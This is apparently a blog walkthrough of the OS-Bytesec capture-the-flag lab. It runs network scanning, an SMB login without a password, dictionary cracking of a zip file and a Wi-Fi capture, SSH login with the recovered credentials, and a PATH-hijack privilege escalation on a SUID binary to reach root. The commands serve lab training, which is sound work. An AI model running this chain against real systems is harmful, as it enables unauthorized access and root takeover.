OS-Bytesec download here OS-Bytesec walkthrough
In this Blog, we slove OS-Bytesec walkthrough This lab is designed by Rahul Gehlaut
Network Scanning: I use Netdiscover is simple ARP Scanner to scan for live hosts in a network.
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netdiscover |
As you can see from the image our VM IP is Now we can be scanning our VM IP with Nmap.
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nmap -A |
As can be seen, there are only three port is open port: 80,139,445,2525
As port 80 is open, let us try and open the IP in the browser as shown in the image below
I did a basic enumeration with I see Web page source code and we see the bottom page ####GET####SMB####Fee
Now enumeration SMB with enum4linux
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enum4linux -A |
And I found after enumerate 3 SMB user Sagar, blackjax, smb, after trying login attempt I see smb user without password login.
login with SMB smbclient // -U smb -p and Enter twice I login into SMB
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smbclient // -U smb -p |
And we see after login smb found 2 file main.txt, safe.zip now download the file our local system with get command
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get safe.zip |
And after download all files we see safe.zip file is locked now cracking safe file with fcrackzip toll Dictionary Attack with file rockyou.txt
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fcrakzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip |
And I found safe.zip file password
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Password: hacker1 |
Now unzip our safe file with password hacker1
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unzip safe.zip |
After unzipping safe file we 2 file secret.jpg, user.cap
Cracking user.cap file with aircrack-ng
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aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap |
After crack cap file found an ssh username: blackjax and password: snowflake
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username: blackjax |
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password: snowflake |
Login with ssh username blackjax and password snowflake
And Found a our first flag blackjax user home directory
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cat user.txt |
Privilege Escalation
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find / -type f -perm -u=s 2>/dev/null |
Again, after some basic enumeration checks(SUID, GUID, Kernel exploits, etc), I saw that the /usr/bin/netscan application had the permission to be executed as SUDO without the SUDO password:
and I run the script
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/usr/bin/netscan |
after running the script I see the script working background netstat command
Privilege Escalation netscan PATH Variable I go to /tmp directory and run the command
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ct /tmp |
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echo "/bin/bash" > netstat |
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export PATH=/tmp:$PATH |
and run the script Again
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/usr/bin/netscan |
and I got root shell check with id command
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id |
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cd /root |
and I go to root folder and run cat root.txt
We got the final root flag.